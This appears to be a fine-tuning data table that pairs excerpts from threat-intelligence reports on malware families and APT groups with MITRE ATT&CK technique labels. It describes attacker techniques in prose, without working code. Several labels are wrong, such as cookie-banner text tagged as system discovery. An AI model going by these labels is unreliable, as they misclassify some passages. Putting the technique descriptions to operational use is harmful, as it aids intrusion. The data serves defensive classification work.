| 1 | input | output | tags |
|---|
| 2 | The command processing function starts by substituting the main module name and path in the hosting process PEB, with the one of the default internet browser. The path of the main browser of the workstation is obtained by reading the registry value | ['T1057 - Process Discovery'] | fine_tune |
| 3 | Along the way, HermeticWiper’s more mundane operations provide us with further IOCs to monitor for. These include the momentary creation of the abused driver as well as a system service. It also modifies several registry keys, including setting the SYSTEM\CurrentControlSet\Control\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver’s execution starts | ['T1569.002 - System Services: Service Execution'] | fine_tune |
| 4 | These Microsoft Office templates are hosted on a command and control server and the downloaded link is embedded in the first stage malicious document | ['T1584.004 - Server'] | fine_tune |
| 5 | Additionally, the IP 211[.]72 [.]242[.]120 is one of the hosts for the domain microsoftmse[.]com, which has been used by several KIVARS variants | ['T1056.001 - Input Capture: Keylogging', 'T1113 - Screen Capture'] | fine_tune |
| 6 | When communicating with its C2 server, Psylo will use HTTPS with a unique user-agent of (notice the lack of a space between "5.0" and "(Windows | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 7 | In older versions, Valak downloads the second stage JS and uses only one obfuscation technique: Base64. The newer versions use XOR in addition to Base64 | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 8 | We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS | ['T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 9 | dlpumgr32.exe, a legitimate signed file that belongs to the DESlock+ product - DLPPREM32.DLL, a malicious DLL sideloaded by dlpumgr32.exe that loads and decodes DLPPREM32.bin - DLPPREM32.bin, a shellcode that decompresses and loads a launcher in memory - data.res, an encrypted file decoded by the launcher and contains two SysUpdate versions: one for a 32-bit architecture and another for a 64-bit architecture - config.res, an encrypted file decoded by the launcher and contains the SysUpdate configuration, such as the command-and-control (C&C) address | ['T1027 - Obfuscated Files or Information', 'T1082 - System Information Discovery'] | fine_tune |
| 10 | The malware has specific features that allow the attackers to perform operations related to online banking transactions, password stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing data from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with VMProtect or Themida | ['T1027.002 - Obfuscated Files or Information: Software Packing'] | fine_tune |
| 11 | The size of the image is more than 600KB and embedded in it is the encrypted IcedID main module. The encryption algorithm is RC4 and the keys are also embedded in the image at specific offset | ['T1027.003 - Steganography'] | fine_tune |
| 12 | It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account | ['T1583.006 - Web Services'] | fine_tune |
| 13 | These variants include system information collection (operating system, computer name), keylogger output, and browser password collection from Internet Explorer, Chrome and Firefox | ['T1082 - System Information Discovery'] | fine_tune |
| 14 | While Kimsuky is very active, the KONNI RAT has also been upgraded to a more evasive piece of malware | ['T1027.002 - Obfuscated Files or Information: Software Packing'] | fine_tune |
| 15 | But first: How did they get the tools on the victim’s systems. The adversary copied those tools over SMB from compromised system to compromised system wherever they needed these tools | ['T1570 - Lateral Tool Transfer'] | fine_tune |
| 16 | This will also force the victim to re-open the browser using the newly written .lnk file, which is now loaded with Grandoreiro’s malicious extension. This extension will load on every browser startup using this specific .lnk file | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1036.005 - Masquerading: Match Legitimate Name or Location'] | fine_tune |
| 17 | Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. Anatomy of the Attack For a number of years targeted attacks have nearly always followed the same modus operandi. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites | ['T1005 - Data from Local System'] | fine_tune |
| 18 | dbghelp.dll is incompatible with DEP (Data Exception Prevention), as shown in Figure 14. Thus, when it loads the operating system will disable DEP for the injected wmplayer.exe process. This means that code can be executed from memory regions that are not marked as executable in the context of this process | ['T1562.001 - Impair Defenses: Disable or Modify Tools'] | fine_tune |
| 19 | For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the "%HOMEDRIVE%\Windows" directory. It also only wipes files that have specific file extensions | ['T1083 - File and Directory Discovery'] | fine_tune |
| 20 | It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory | ['T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 21 | Registry traversal for Putty data exfiltration (left), code showing hostname, username and Private Key Files (right | ['T1552.002 - Unsecured Credentials: Credentials in Registry'] | fine_tune |
| 22 | While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload’s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name | ['T1106 - Native API'] | fine_tune |
| 23 | After Tor is up and running, Siloscape uses it to connect to its C2 – an IRC server, using an onion address that was provided as a command line argument | ['T1071 - Application Layer Protocol'] | fine_tune |
| 24 | One interesting thing to note is that the Keybase account used by the attacker to chat with their victims has the same logo of the Pay2Key EOSIO smart contract system | ['T1585 - Establish Accounts'] | fine_tune |
| 25 | It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions | ['T1485 - Data Destruction'] | fine_tune |
| 26 | The LNK file contains a list of commands that will be executed upon running, and a blob that is a base64 encoded compressed payload | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 27 | Fourth, this Darkhotel event is not based on the network protocol C2, but based on a custom file transfer control instruction | ['T1135 - Network Share Discovery'] | fine_tune |
| 28 | When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation | ['T1047 - Windows Management Instrumentation', 'T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1559.001 - Component Object Model', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 29 | The threat used valid accounts against remote services: Cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap in the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the traces in log files showed more than usual login attempts with a username formatted as email address, e.g. username>@<email domain>. While usernames for legitimate logins at the victim’s network were generally formatted like <domain>\<username>. And attempted logins came from a relative small set of IP-addresses | ['T1016 - System Network Configuration Discovery', 'T1133 - External Remote Services'] | fine_tune |
| 30 | CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. These files usually include private keys of cryptocurrency wallets. If the victims use iTunes to backup files from iPhone to Mac (can be via Wi-Fi), their iPhone text messages (SMSFILE) will also be retrieved by the attackers (Figure 5 | ['T1083 - File and Directory Discovery'] | fine_tune |
| 31 | The JavaScript component is the first stage of the attack and can deploy other malware such as a C# spy component, Golden Chickens components or several Python-based tools. The name Evilnum was given to the C# component by other researchers in the past, but the JS component also has been referred to as Evilnum. We have named the group Evilnum as that is the name of their flagship malware, and we’ll refer to the various malware pieces as components | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 32 | But Ryuk isn’t new to us… we’ve been tracking it for years. More important than just looking at Ryuk ransomware itself, though, is looking at the operators behind it and their tactics, techniques, and procedures (TTPs)—especially those used before they encrypt any data. The operators of Ryuk ransomware are known by different names in the community, including “WIZARD SPIDER,” “UNC1878,” and “Team9. The malware they use has included TrickBot, Anchor, Bazar, Ryuk, and others | ['T1047 - Windows Management Instrumentation', 'T1018 - Remote System Discovery'] | fine_tune |
| 33 | The plugin is executed by using the Info command in the Lizar client application. A data structure containing the OS version, user name and computer name is sent to the server | ['T1082 - System Information Discovery'] | fine_tune |
| 34 | Observed GoldMax C2 domains are high-reputation and high-prevalence, often acquired from domain resellers so that Whois records retain the creation date from their previous registration, or domains that may have been compromised. This tactic complements NOBELIUM’s operational security strategy as these domains are more likely to be overlooked by security products and analysts based on their perceived long-lived domain ownership. Put simply, several domains we have shared as GoldMax C2 domains are only associated with NOBELIUM after the time they were re-sold or compromised – and Microsoft has provided that indicator context where it is available to us | ['T1584.001 - Domains'] | fine_tune |
| 35 | The malware proceeds to blacklist certain processes such as “wininit.exe” when approaches memory scraping in order to speed necessary card scan logic | ['T1057 - Process Discovery'] | fine_tune |
| 36 | We were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat intelligence tool. The earliest malware sample we were able to collect had a compile timestamp in May 2016. The samples themselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others | ['T1083 - File and Directory Discovery'] | fine_tune |
| 37 | From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. Strangely, in one case, the threat actors also appear to have used a domain name similar to the Foreign Policy Research Institute (FPRI) in a message purporting to be from CFR. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. Its called the "packager trick" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\Users\%username%\AppData\Local\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious "scriptlet" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial "qrat.exe" dropper from the current user's %tmp% directory. The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from AirVPN. Conclusion . The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. Volexity is actively tracking this group and the infrastructure currently in use for the benefit of its network security monitoring and threat intelligence customers | ['T1189 - Drive-by Compromise'] | fine_tune |
| 38 | Apply the Microsoft security updates for MS17-010, including the updates for the Windows XP and Windows Server 2003 legacy operating systems. Disable SMBv1 on systems where it is not necessary (e.g. hosts that do not need to communicate with Windows XP and Windows 2000 systems). Carefully evaluate the need for allowing SMBv1-capable systems on interconnected networks compared to the associated risks. Scan networks for the presence of the DoublePulsar backdoor using plugins for tools such as Nmap. Use network auditing tools to scan networks for hosts that are vulnerable to the vulnerabilities described in MS17-010. Implement a backup strategy that includes storing data using offline backup media. Backups to locally connected, network-attached, or cloud-based storage are often insufficient because ransomware frequently accesses and encrypts files stored on these systems | ['T1490 - Inhibit System Recovery'] | fine_tune |
| 39 | SUPERNOVA is implemented as a modification to the existing ‘app_web_logoimagehandler.ashx.b6031896.dll’ module of the SolarWinds Orion application. The purpose of this module, in it’s legitimate form, is to return the logo image configured by the user to various web pages of the SolarWinds Orion web application. In legitimate operation, this class only contains the ProcessRequest() and LogoImageHandler() methods, a private static Log object, and public boolean parameter IsReusable | ['T1036.005 - Masquerading: Match Legitimate Name or Location'] | fine_tune |
| 40 | AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. One of the new modules that has been added to this malware is the capability to steal WiFi profiles | ['T1555 - Credentials from Password Stores'] | fine_tune |
| 41 | TA551 has distributed different families of malware, including Ursnif (Gozi/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 42 | The plugins are variously designed to load other tools like Mimikatz or Carbanak, retrieve information from the victim machine, take screenshots, harvest credentials, retrieve browser histories, and more | ['T1217 - Browser Bookmark Discovery'] | fine_tune |
| 43 | During our analysis, we successfully extracted the command line argument to execute its payload. The following command is used to execute the payload | ['T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 44 | When receiving HTTP commands, the WellMess server is setup to receive POST requests that contain RC6 encrypted cookies. The server decrypts the cookies using a hardcoded RC6 key and expects the decrypted data to contain no more than four tags | ['T1140 - Deobfuscate/Decode Files or Information', 'T1573.001 - Symmetric Cryptography'] | fine_tune |
| 45 | Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors — both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. The attacks have become more sophisticated, and have evolved to evade detection on a continual basis. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright | ['T1059.007 - Command and Scripting Interpreter: JavaScript'] | fine_tune |
| 46 | After an initial dormant period of up to two weeks, it retrieves and executes commands, called “Jobs”, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. TEARDROP and BEACON Malware Used . Multiple SUNBURST samples have been recovered, delivering different payloads. Next it checks that HKU\SOFTWARE\Microsoft\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. The credentials used for lateral movement were always different from those used for remote access. Detection Opportunity . Organizations can use HX’s LogonTracker module to graph all logon activity and analyze systems displaying a one-to-many relationship between source systems and accounts. After an initial dormant period of up to two weeks, it retrieves and executes commands, called “Jobs”, that include the ability to transfer and execute files, profile the system, and disable system services. The userID is encoded via a custom XOR scheme after the MD5 is calculated. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: "\{[0-9a-f-]{36}\}"||"[0-9a-f]{32}"||"[0-9a-f]{16}". Command data is spread across multiple strings that are disguised as GUID and HEX strings. The extracted message is single-byte XOR decoded using the first byte of the message, and this is then DEFLATE decompressed | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 47 | IcedID uses TLS in all of its communication but the certificate is self-signed. They can be spotted, as they use this kind of a self-signed certificate. The keyword “Internet Widgits Pty Ltd” is also being used by Trickbot, another banking malware, and it is believed that Trickbot and IcedID are cousins | ['T1573.002 - Asymmetric Cryptography', 'T1185 - Browser Session Hijacking'] | fine_tune |
| 48 | In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a “Telegram Downloads” folder on an unnamed victim | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 49 | PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry | ['T1552.002 - Unsecured Credentials: Credentials in Registry'] | fine_tune |
| 50 | MegaCortex v1 was executed manually by threat actors using a separate batch file to kill security processes and stop/disable services related to security, backup and shadow copies. That same batch file was subsequently used to execute the MegaCortex binary with a Base64 key as a command-line argument | ['T1489 - Service Stop', 'T1562.001 - Impair Defenses: Disable or Modify Tools'] | fine_tune |
| 51 | Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies | ['T1005 - Data from Local System'] | fine_tune |
| 52 | First observed by Microsoft on Jan. 13, 2022, WhisperGate malware is computer network attack (CNA) malware aimed at deleting Microsoft Windows Defender and corrupting files on the target. It consists of two samples: One appears as ransomware while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload. At the time of writing, there are two known samples identified as WhisperGate: Stage1.exe and Stage2.exe. Stage1.exe purports to be ransomware, as it overwrites the target’s master boot record with 512 bytes and upon reboot displays the following ransom note | ['T1561.002 - Disk Structure Wipe'] | fine_tune |
| 53 | The second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of ITW sightings | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 54 | These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information | ['T1082 - System Information Discovery'] | fine_tune |
| 55 | Of the tools listed above, many were obfuscated with VMProtect (v1.60-2.05), a recurring theme with BackdoorDiplomacy tools | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 56 | An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise — usually as a download from a spam email — they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER’s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network | ['T1071.001 - Application Layer Protocol: Web Protocols', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1204.002 - User Execution: Malicious File', 'T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 57 | Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. The C&C scans for specific destinations’ known vulnerabilities in Hadoop, Redis and ActiveMQ (CVE-2016-3088) for self-propagation. Hadoop’s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message | ['T1203 - Exploitation for Client Execution'] | fine_tune |
| 58 | As can be seen in the figure above, the packer used for CVE-2019-0803 is very similar to the one used in CVE-2017-0005. The file was compiled on September 18, 2018, and is also internally named “Add.dll”. Like the previously packed exploit, CVE-2019-0803 also has an export function named “AddByGod” and contains debug information | ['T1027.002 - Obfuscated Files or Information: Software Packing'] | fine_tune |
| 59 | Although, the use of target names with actuating themes is not new to this group, there has been a significant uptick in the number of emails received and this campaign has been persistently active for the past few weeks | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 60 | This function is the supporting functionality for WinVNC. To allow the VNC session to connect, the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001 | ['T1021.005 - Remote Services:VNC'] | fine_tune |
| 61 | We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents. Tools linked to Gamaredon and discussed in this blogpost are detected as variants of MSIL/Pterodo, Win32/Pterodo or Win64/Pterodo by ESET’s products. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. It also saves to disk the malicious OTM file (Outlook VBA project) that contains a macro, the malicious email attachment and, in some cases, a list of recipients that the emails should be sent to. Office macro injection module – CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. Module updates . Interestingly, some of the custom tools described in Palo Alto Networks’ 2017 blogpost on Gamaredon are still being updated and in use today. C# compiler module . This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. As with many other tools used by the Gamaredon group, they come in four different coding languages: C/C++, C#, batch file and VBScript. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 62 | b.wnry — Bitmap image used as desktop wallpaper (shown in Figure 2) - c.wnry — Configuration containing Tor command and control (C2) addresses, Bitcoin addresses, and other data - r.wnry — Ransom demand text - s.wnry — ZIP archive containing Tor software to be installed on the victim’s system; saved in TaskData directory - t.wnry — Encrypted DLL containing file-encryption functionality - u.wnry — Main module of the WCry ransomware “decryptor” - taskdl.exe — WNCRYT temporary file cleanup program - taskse.exe — Program that displays decryptor window to RDP sessions - msg — Directory containing Rich Text Format (RTF) ransom demands in multiple languages | ['T1090.003 - Proxy: Multi-hop Proxy'] | fine_tune |
| 63 | CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment | ['T1090 - Proxy', 'T1021.004 - Remote Services: SSH', 'T1572 - Protocol Tunneling'] | fine_tune |
| 64 | In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 65 | After the ransomware is executed, Clop appends the .clop extension to the victim's files. We have observed different variants using different extensions, such as “.CIIp”, “.Cllp” and “.C_L_O_P”. Different versions of the ransom note have also been observed after encryption. Depending on the variant, any of these ransom text files could drop: “ClopReadMe.txt”, “README_README.txt”, “Cl0pReadMe.txt“ and “READ_ME_!!!.TXT | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 66 | H1N1 has self-propagation/lateral movement functionality (which requires user interaction) via mapped/available network shares or mounted USB devices | ['T1080 - Taint Shared Content'] | fine_tune |
| 67 | Another component of the KGH suite is the m.dll module, which is an information stealer that harvest data from browsers, Windows Credential Manager, WINSCP and mail clients | ['T1114.001 - Email Collection: Local Email Collection'] | fine_tune |
| 68 | Before the driver is loaded, the malware disables crash dump by setting the following registry key | ['T1070 - Indicator Removal on Host', 'T1562.006 - Impair Defenses: Indicator Blocking', 'T1112 - Modify Registry'] | fine_tune |
| 69 | Conclusion Tick has left a trail of evidence indicating that its activity began as early as 2006. In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 70 | Gathering system information and sending it to the control server. The system information gathered from the endpoint includes: MAC address of the endpoint Computer Name Product name from HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName This information is concatenated into a single string in the format: “MAC_Address||ComputerName||ProductName” and is sent to the control server - MAC address of the endpoint - Computer Name - Product name from HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName - This information is concatenated into a single string in the format: “MAC_Address||ComputerName||ProductName” and is sent to the control server - Recording HTTP requests from the control server to the temporary file prx in the implant’s install directory with the current system timestamp | ['T1012 - Query Registry'] | fine_tune |
| 71 | Credential hopping for obscuring lateral movement - Office 365 (O365) Service Principal and Application hijacking, impersonation and manipulation - Stealing browser cookies for bypassing multifactor authentication - Use of the TrailBlazer implant and the Linux variant of GoldMax malware - Credential theft using Get-ADReplAccount | ['T1078.002 - Domain Accounts', 'T1550.001 - Application Access Token'] | fine_tune |
| 72 | In the analyzed sample the RAT component was named “BotDLL[.]dll”. It has some typical RAT functionality such as command shell, video recording of the screen, remote desktop, port forwarding, and file system access | ['T1125 - Video Capture', 'T1090 - Proxy', 'T1005 - Data from Local System'] | fine_tune |
| 73 | This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. It is capable of downloading and executing files, capturing screenshots and executing arbitrary commands on compromised systems | ['T1113 - Screen Capture'] | fine_tune |
| 74 | Introduced in macOS 10.11, this utility has only one publicly documented use, which is to return the status of the System Integrity Protection tool. The csrutil tool is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not | ['T1082 - System Information Discovery'] | fine_tune |
| 75 | Shortly after this RTF document is opened, the remaining stages of the Inception malware are found executing on the system. The loader DLL is responsible for decrypting and injecting the core payload DLL into memory, from an encrypted file present on disk. The core payload DLL's main function is to gather system information, execute other malware in the form of plugins, and update itself | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 76 | The NOKKI malware itself has been updated in the short period of time it has been observed, moving from FTP to HTTP for C2 operations. The malware is modular in nature, and based on analysis of the information gathering module, it is highly likely the NOKKI operators are the same as the KONNI operators | ['T1071.001 - Application Layer Protocol: Web Protocols', 'T1071.002 - File Transfer Protocols'] | fine_tune |
| 77 | The network mode being set to the host along with the container trying to be deployed as a privileged container. The Docker Hub account of MegawebMaster has numerous public images, five of which have TeamTNT utilities with a significant amount of downloads. These five images include dockgeddon, docker, tornadopw, and dcounter (T1204.003 | ['T1496 - Resource Hijacking'] | fine_tune |
| 78 | TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims’ servers | ['T1610 - Deploy a container', 'T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 79 | Even simple API calls were obfuscated, and instead of just calling the functions, Siloscape made the effort to use the Native API (NTAPI) version of the same function | ['T1106 - Native API', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 80 | The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed PLAINTEE executes the following command in a new process to add persistence | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 81 | In this version, the communication protocol with the C&C server was also upgraded to use AES encryption | ['T1573.001 - Symmetric Cryptography'] | fine_tune |
| 82 | The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be “nylalobghyhirgh.com | ['T1568.002 - Domain Generation Algorithms'] | fine_tune |
| 83 | HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 84 | The attackers then attempt to gain root access to the server by setting up a local privileged user named ‘hilde’ on the host server and use it in order to connect back via SSH | ['T1021.004 - Remote Services: SSH'] | fine_tune |
| 85 | The Russia-linked Shuckworm group (aka Gamaredon, Armageddon) is continuing to conduct cyber-espionage attacks against targets in Ukraine. Over the course of recent months, Symantec’s Threat Hunter Team, a part of Broadcom Software, has found evidence of attempted attacks against a number of organizations in the country | ['T1057 - Process Discovery', 'T1204.002 - User Execution: Malicious File'] | fine_tune |
| 86 | After the malware has invoked a method named _s_is_high_time and waited on several timers to expire, it begins encrypting the (unfortunate) user’s files, by invoking a function named carve_target. It then generates a list of files to encrypt, by invoking the get_targets function, passing in the is_file_target as a filter function. This filter function filters out all files, except those that match certain file extensions. The encrypted list of extensions is hard-coded at address 000000010001299E within the malware. In part one of this blog post series, we decrypted all the embedded string, thus can readily examine the decrypted list | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 87 | Timeline . OSX/FruitFly: 1) 2) Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.client.client.plist 3) Remove the malware's persistent perl script & file. Ok, so the attackers are using an open-source multi-stage post-exploitation agent. Unfortunately this file is now inaccessible. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. Finally, the malware modifies the infected host's network settings in order to set up a proxy who's address is (dynamically) specified via a remote proxy auto-configuration (PAC) file. As it's a binary plist file, dump its contents with the plutil utility (using the -p commandline flag): . As the KeepAlive key has been set to 1 (true), the Launch Daemon will be automatically started everytime the infected system is rebooted. MacRansom is the the first 'Ransomware-as-a-Service' for macOS, that aims to encrypt (ransom) all user's files. Then these files will be passed (to a new instance) of the malware, in order to be encrypted. Thus it appears that once encrypted, the files are pretty much gone for good (save for a perhaps a brute force decryption attack). Good news, RansomWhere. Using the neat 'Suspicious Package' application, we can statically examine this script: In short, it persists CPUMeaner as a launch agent via the /Library/LaunchAgents/com.osxext.cpucooler.plist file | ['T1140 - Deobfuscate/Decode Files or Information'] | 